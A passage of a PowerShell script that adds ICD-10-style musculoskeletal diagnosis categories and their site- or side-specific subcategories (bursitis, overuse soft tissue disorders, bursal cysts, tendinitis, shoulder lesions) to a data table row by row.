$DiagnosisList.Rows.Add("Crepitant synovitis (acute) (chronic), hand","Crepitant synovitis (acute) (chronic), unspecified hand") + $null = $DiagnosisList.Rows.Add("Bursitis of hand","Bursitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Bursitis of hand","Bursitis, right hand") + $null = $DiagnosisList.Rows.Add("Bursitis of hand","Bursitis, left hand") + $null = $DiagnosisList.Rows.Add("Olecranon bursitis","Olecranon bursitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Olecranon bursitis","Olecranon bursitis, right elbow") + $null = $DiagnosisList.Rows.Add("Olecranon bursitis","Olecranon bursitis, left elbow") + $null = $DiagnosisList.Rows.Add("Other bursitis of elbow","Other bursitis of elbow, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other bursitis of elbow","Other bursitis of elbow, right elbow") + $null = $DiagnosisList.Rows.Add("Other bursitis of elbow","Other bursitis of elbow, left elbow") + $null = $DiagnosisList.Rows.Add("Prepatellar bursitis","Prepatellar bursitis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Prepatellar bursitis","Prepatellar bursitis, right knee") + $null = $DiagnosisList.Rows.Add("Prepatellar bursitis","Prepatellar bursitis, left knee") + $null = $DiagnosisList.Rows.Add("Other bursitis of knee","Other bursitis of knee, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other bursitis of knee","Other bursitis of knee, right knee") + $null = $DiagnosisList.Rows.Add("Other bursitis of knee","Other bursitis of knee, left knee") + $null = $DiagnosisList.Rows.Add("Trochanteric bursitis","Trochanteric bursitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Trochanteric bursitis","Trochanteric bursitis, right hip") + $null = $DiagnosisList.Rows.Add("Trochanteric bursitis","Trochanteric bursitis, left hip") + $null = $DiagnosisList.Rows.Add("Other bursitis of hip","Other bursitis of hip, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other bursitis of hip","Other bursitis of hip, right hip") + $null = $DiagnosisList.Rows.Add("Other bursitis of hip","Other bursitis of hip, left hip") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure","Other soft tissue disorders related to use, overuse and pressure of unspecified site") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of shoulder","Other soft tissue disorders related to use, overuse and pressure, right shoulder") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of shoulder","Other soft tissue disorders related to use, overuse and pressure, left shoulder") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of shoulder","Other soft tissue disorders related to use, overuse and pressure, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of upper arm","Other soft tissue disorders related to use, overuse and pressure, right upper arm") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of upper arm","Other soft tissue disorders related to use, overuse and pressure, left upper arm") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of upper arm","Other soft tissue disorders related to use, overuse and pressure, unspecified upper arms") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of forearm","Other soft tissue disorders related to use, overuse and pressure, right forearm") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of forearm","Other soft tissue disorders related to use, overuse and pressure, left forearm") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of forearm","Other soft tissue disorders related to use, overuse and pressure, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of hand","Other soft tissue disorders related to use, overuse and pressure, right hand") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of hand","Other soft tissue disorders related to use, overuse and pressure, left hand") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of hand","Other soft tissue disorders related to use, overuse and pressure, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of thigh","Other soft tissue disorders related to use, overuse and pressure, right thigh") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of thigh","Other soft tissue disorders related to use, overuse and pressure, left thigh") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of thigh","Other soft tissue disorders related to use, overuse and pressure, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure lower leg","Other soft tissue disorders related to use, overuse and pressure, right lower leg") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure lower leg","Other soft tissue disorders related to use, overuse and pressure, left lower leg") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure lower leg","Other soft tissue disorders related to use, overuse and pressure, unspecified leg") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of ankle and foot","Other soft tissue disorders related to use, overuse and pressure, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of ankle and foot","Other soft tissue disorders related to use, overuse and pressure, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure of ankle and foot","Other soft tissue disorders related to use, overuse and pressure, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure other site","Other soft tissue disorders related to use, overuse and pressure other site") + $null = $DiagnosisList.Rows.Add("Other soft tissue disorders related to use, overuse and pressure multiple sites","Other soft tissue disorders related to use, overuse and pressure multiple sites") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure","Unspecified soft tissue disorder related to use, overuse and pressure of unspecified site") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of shoulder","Unspecified soft tissue disorder related to use, overuse and pressure, right shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of shoulder","Unspecified soft tissue disorder related to use, overuse and pressure, left shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of shoulder","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of upper arm","Unspecified soft tissue disorder related to use, overuse and pressure, right upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of upper arm","Unspecified soft tissue disorder related to use, overuse and pressure, left upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of upper arm","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of forearm","Unspecified soft tissue disorder related to use, overuse and pressure, right forearm") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of forearm","Unspecified soft tissue disorder related to use, overuse and pressure, left forearm") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of forearm","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of hand","Unspecified soft tissue disorder related to use, overuse and pressure, right hand") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of hand","Unspecified soft tissue disorder related to use, overuse and pressure, left hand") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of hand","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified hand") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of thigh","Unspecified soft tissue disorder related to use, overuse and pressure, right thigh") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of thigh","Unspecified soft tissue disorder related to use, overuse and pressure, left thigh") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of thigh","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure lower leg","Unspecified soft tissue disorder related to use, overuse and pressure, right lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure lower leg","Unspecified soft tissue disorder related to use, overuse and pressure, left lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure lower leg","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of ankle and foot","Unspecified soft tissue disorder related to use, overuse and pressure, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of ankle and foot","Unspecified soft tissue disorder related to use, overuse and pressure, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure of ankle and foot","Unspecified soft tissue disorder related to use, overuse and pressure, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure other","Unspecified soft tissue disorder related to use, overuse and pressure other") + $null = $DiagnosisList.Rows.Add("Unspecified soft tissue disorder related to use, overuse and pressure multiple sites","Unspecified soft tissue disorder related to use, overuse and pressure multiple sites") + $null = $DiagnosisList.Rows.Add("Abscess of bursa","Abscess of bursa, unspecified site") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, shoulder","Abscess of bursa, right shoulder") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, shoulder","Abscess of bursa, left shoulder") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, shoulder","Abscess of bursa, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, elbow","Abscess of bursa, right elbow") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, elbow","Abscess of bursa, left elbow") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, elbow","Abscess of bursa, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, wrist","Abscess of bursa, right wrist") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, wrist","Abscess of bursa, left wrist") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, wrist","Abscess of bursa, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, hand","Abscess of bursa, right hand") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, hand","Abscess of bursa, left hand") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, hand","Abscess of bursa, unspecified hand") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, hip","Abscess of bursa, right hip") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, hip","Abscess of bursa, left hip") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, hip","Abscess of bursa, unspecified hip") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, knee","Abscess of bursa, right knee") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, knee","Abscess of bursa, left knee") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, knee","Abscess of bursa, unspecified knee") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, ankle and foot","Abscess of bursa, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, ankle and foot","Abscess of bursa, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, ankle and foot","Abscess of bursa, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, other site","Abscess of bursa, other site") + $null = $DiagnosisList.Rows.Add("Abscess of bursa, multiple sites","Abscess of bursa, multiple sites") + $null = $DiagnosisList.Rows.Add("Other infective bursitis","Other infective bursitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, shoulder","Other infective bursitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, shoulder","Other infective bursitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, shoulder","Other infective bursitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, elbow","Other infective bursitis, right elbow") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, elbow","Other infective bursitis, left elbow") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, elbow","Other infective bursitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, wrist","Other infective bursitis, right wrist") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, wrist","Other infective bursitis, left wrist") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, wrist","Other infective bursitis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, hand","Other infective bursitis, right hand") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, hand","Other infective bursitis, left hand") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, hand","Other infective bursitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, hip","Other infective bursitis, right hip") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, hip","Other infective bursitis, left hip") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, hip","Other infective bursitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, knee","Other infective bursitis, right knee") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, knee","Other infective bursitis, left knee") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, knee","Other infective bursitis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, ankle and foot","Other infective bursitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, ankle and foot","Other infective bursitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, ankle and foot","Other infective bursitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, other site","Other infective bursitis, other site") + $null = $DiagnosisList.Rows.Add("Other infective bursitis, multiple sites","Other infective bursitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Synovial cyst of popliteal space [Baker]","Synovial cyst of popliteal space [Baker], unspecified knee") + $null = $DiagnosisList.Rows.Add("Synovial cyst of popliteal space [Baker]","Synovial cyst of popliteal space [Baker], right knee") + $null = $DiagnosisList.Rows.Add("Synovial cyst of popliteal space [Baker]","Synovial cyst of popliteal space [Baker], left knee") + $null = $DiagnosisList.Rows.Add("Other bursal cyst","Other bursal cyst, unspecified site") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, shoulder","Other bursal cyst, right shoulder") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, shoulder","Other bursal cyst, left shoulder") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, shoulder","Other bursal cyst, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, elbow","Other bursal cyst, right elbow") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, elbow","Other bursal cyst, left elbow") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, elbow","Other bursal cyst, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, wrist","Other bursal cyst, right wrist") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, wrist","Other bursal cyst, left wrist") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, wrist","Other bursal cyst, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, hand","Other bursal cyst, right hand") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, hand","Other bursal cyst, left hand") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, hand","Other bursal cyst, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, hip","Other bursal cyst, right hip") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, hip","Other bursal cyst, left hip") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, hip","Other bursal cyst, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, ankle and foot","Other bursal cyst, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, ankle and foot","Other bursal cyst, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, ankle and foot","Other bursal cyst, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, other site","Other bursal cyst, other site") + $null = $DiagnosisList.Rows.Add("Other bursal cyst, multiple sites","Other bursal cyst, multiple sites") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa","Calcium deposit in bursa, unspecified site") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, elbow","Calcium deposit in bursa, right elbow") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, elbow","Calcium deposit in bursa, left elbow") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, elbow","Calcium deposit in bursa, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, wrist","Calcium deposit in bursa, right wrist") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, wrist","Calcium deposit in bursa, left wrist") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, wrist","Calcium deposit in bursa, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, hand","Calcium deposit in bursa, right hand") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, hand","Calcium deposit in bursa, left hand") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, hand","Calcium deposit in bursa, unspecified hand") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, hip","Calcium deposit in bursa, right hip") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, hip","Calcium deposit in bursa, left hip") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, hip","Calcium deposit in bursa, unspecified hip") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, knee","Calcium deposit in bursa, right knee") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, knee","Calcium deposit in bursa, left knee") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, knee","Calcium deposit in bursa, unspecified knee") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, ankle and foot","Calcium deposit in bursa, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, ankle and foot","Calcium deposit in bursa, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, ankle and foot","Calcium deposit in bursa, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, other site","Calcium deposit in bursa, other site") + $null = $DiagnosisList.Rows.Add("Calcium deposit in bursa, multiple sites","Calcium deposit in bursa, multiple sites") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified","Other bursitis, not elsewhere classified, unspecified site") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, elbow","Other bursitis, not elsewhere classified, right elbow") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, elbow","Other bursitis, not elsewhere classified, left elbow") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, elbow","Other bursitis, not elsewhere classified, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, wrist","Other bursitis, not elsewhere classified, right wrist") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, wrist","Other bursitis, not elsewhere classified, left wrist") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, wrist","Other bursitis, not elsewhere classified, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, hand","Other bursitis, not elsewhere classified, right hand") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, hand","Other bursitis, not elsewhere classified, left hand") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, hand","Other bursitis, not elsewhere classified, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, hip","Other bursitis, not elsewhere classified, right hip") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, hip","Other bursitis, not elsewhere classified, left hip") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, hip","Other bursitis, not elsewhere classified, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, knee","Other bursitis, not elsewhere classified, right knee") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, knee","Other bursitis, not elsewhere classified, left knee") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, knee","Other bursitis, not elsewhere classified, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, ankle and foot","Other bursitis, not elsewhere classified, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, ankle and foot","Other bursitis, not elsewhere classified, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, ankle and foot","Other bursitis, not elsewhere classified, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other bursitis, not elsewhere classified, other site","Other bursitis, not elsewhere classified, other site") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies","Other specified bursopathies, unspecified site") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, shoulder","Other specified bursopathies, right shoulder") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, shoulder","Other specified bursopathies, left shoulder") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, shoulder","Other specified bursopathies, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, elbow","Other specified bursopathies, right elbow") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, elbow","Other specified bursopathies, left elbow") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, elbow","Other specified bursopathies, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, wrist","Other specified bursopathies, right wrist") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, wrist","Other specified bursopathies, left wrist") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, wrist","Other specified bursopathies, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, hand","Other specified bursopathies, right hand") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, hand","Other specified bursopathies, left hand") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, hand","Other specified bursopathies, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, hip","Other specified bursopathies, right hip") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, hip","Other specified bursopathies, left hip") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, hip","Other specified bursopathies, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, knee","Other specified bursopathies, right knee") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, knee","Other specified bursopathies, left knee") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, knee","Other specified bursopathies, unspecified knee") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, ankle and foot","Other specified bursopathies, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, ankle and foot","Other specified bursopathies, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, ankle and foot","Other specified bursopathies, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, other site","Other specified bursopathies, other site") + $null = $DiagnosisList.Rows.Add("Other specified bursopathies, multiple sites","Other specified bursopathies, multiple sites") + $null = $DiagnosisList.Rows.Add("Bursopathy, unspecified","Bursopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Palmar fascial fibromatosis [Dupuytren]") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Knuckle pads") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Plantar fascial fibromatosis") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Pseudosarcomatous fibromatosis") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Necrotizing fasciitis") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Other fibroblastic disorders") + $null = $DiagnosisList.Rows.Add("Fibroblastic disorders","Fibroblastic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Adhesive capsulitis of shoulder","Adhesive capsulitis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Adhesive capsulitis of shoulder","Adhesive capsulitis of right shoulder") + $null = $DiagnosisList.Rows.Add("Adhesive capsulitis of shoulder","Adhesive capsulitis of left shoulder") + $null = $DiagnosisList.Rows.Add("Unspecified rotator cuff tear or rupture, not specified as traumatic","Unspecified rotator cuff tear or rupture of unspecified shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Unspecified rotator cuff tear or rupture, not specified as traumatic","Unspecified rotator cuff tear or rupture of right shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Unspecified rotator cuff tear or rupture, not specified as traumatic","Unspecified rotator cuff tear or rupture of left shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Incomplete rotator cuff tear or rupture not specified as traumatic","Incomplete rotator cuff tear or rupture of unspecified shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Incomplete rotator cuff tear or rupture not specified as traumatic","Incomplete rotator cuff tear or rupture of right shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Incomplete rotator cuff tear or rupture not specified as traumatic","Incomplete rotator cuff tear or rupture of left shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Complete rotator cuff tear or rupture not specified as traumatic","Complete rotator cuff tear or rupture of unspecified shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Complete rotator cuff tear or rupture not specified as traumatic","Complete rotator cuff tear or rupture of right shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Complete rotator cuff tear or rupture not specified as traumatic","Complete rotator cuff tear or rupture of left shoulder, not specified as traumatic") + $null = $DiagnosisList.Rows.Add("Bicipital tendinitis","Bicipital tendinitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Bicipital tendinitis","Bicipital tendinitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Bicipital tendinitis","Bicipital tendinitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis of shoulder","Calcific tendinitis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis of shoulder","Calcific tendinitis of right shoulder") + $null = $DiagnosisList.Rows.Add("Calcific tendinitis of shoulder","Calcific tendinitis of left shoulder") + $null = $DiagnosisList.Rows.Add("Impingement syndrome of shoulder","Impingement syndrome of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Impingement syndrome of shoulder","Impingement syndrome of right shoulder") + $null = $DiagnosisList.Rows.Add("Impingement syndrome of shoulder","Impingement syndrome of left shoulder") + $null = $DiagnosisList.Rows.Add("Bursitis of shoulder","Bursitis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Bursitis of shoulder","Bursitis of right shoulder") + $null = $DiagnosisList.Rows.Add("Bursitis of shoulder","Bursitis of left shoulder") + $null = $DiagnosisList.Rows.Add("Other shoulder lesions","Other shoulder lesions, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other shoulder lesions","Other shoulder lesions, right shoulder") + $null = $DiagnosisList.Rows.Add("Other shoulder lesions","Other shoulder lesions, left shoulder") + $null = $DiagnosisList.Rows.Add("Shoulder lesion, unspecified","Shoulder lesion, unspecified, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Shoulder lesion, unspecified","Shoulder lesion, unspecified, right shoulder") + $null = $DiagnosisList.Rows.Add("Shoulder lesion, unspecified","Shoulder lesion, unspecified, left shoulder") + $null = $DiagnosisList.Rows.Add("Gluteal tendinitis","Gluteal tendinitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Gluteal tendinitis","Gluteal tendinitis, right hip") + $null = $DiagnosisList.Rows.Add("Gluteal tendinitis","Gluteal tendinitis, left hip") + $null = $DiagnosisList.Rows.Add("Psoas tendinitis","Psoas tendinitis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Psoas tendinitis","Psoas tendinitis, right hip") + $null = $DiagnosisList.Rows.Add("Psoas tendinitis","Psoas tendinitis, left hip") + $null = $DiagnosisList.Rows.Add("Iliac crest spur","Iliac crest spur, unspecified hip") + $null = $DiagnosisList.Rows.Add("Iliac crest spur","Iliac crest spur, right hip") + $null = $DiagnosisList.Rows.Add("Iliac crest spur","Iliac crest spur, left hip") + $null = $DiagnosisList.Rows.Add("Iliotibial band syndrome","Iliotibial band syndrome, unspecified leg") + $null = $DiagnosisList.Rows.Add("Iliotibial band syndrome","Iliotibial band syndrome, right leg") + $null = $DiagnosisList.Rows.Add("Iliotibial band syndrome","Iliotibial band syndrome, left leg") + $null = $DiagnosisList.Rows.Add("Tibial collateral bursitis [Pellegrini-Stieda]","Tibial collateral bursitis [Pellegrini-Stieda], unspecified leg") + $null = $DiagnosisList.Rows.Add("Tibial collateral bursitis [Pellegrini-Stieda]","Tibial collateral bursitis [Pellegrini-Stieda], right leg") + $null = $DiagnosisList.Rows.Add("Tibial collateral bursitis [Pellegrini-Stieda]","Tibial collateral bursitis [Pellegrini-Stieda], left leg") + $null = $DiagnosisList.Rows.Add("Patellar tendinitis","Patellar tendinitis, unspecified knee") + $null = $DiagnosisList.Rows.Add("Patellar tendinitis","Patellar tendinitis, right knee") + $null = $DiagnosisList.Rows.Add("Patellar tendinitis","Patellar tendinitis, left knee") + $null = $DiagnosisList.Rows.Add("Achilles tendinitis","Achilles tendinitis, unspecified leg") + $null = $DiagnosisList.Rows.Add("Achilles tendinitis","Achilles tendinitis, right leg") + $null = $DiagnosisList.Rows.Add("Achilles tendinitis","Achilles tendinitis, left leg") + $null = 